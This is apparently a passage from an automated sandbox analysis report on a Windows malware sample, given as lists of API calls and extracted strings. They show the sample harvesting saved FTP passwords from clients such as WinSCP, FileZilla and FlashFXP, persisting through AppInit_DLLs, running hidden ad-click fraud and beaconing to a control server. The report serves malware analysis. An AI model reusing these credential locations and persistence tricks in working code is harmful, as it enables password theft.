                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          APIs
                          Strings
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          APIs
                          Strings
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          Strings
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          • 0, xrefs: 0040AA5B
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          • folder, xrefs: 00405184
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • personal favorites, xrefs: 00405176
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
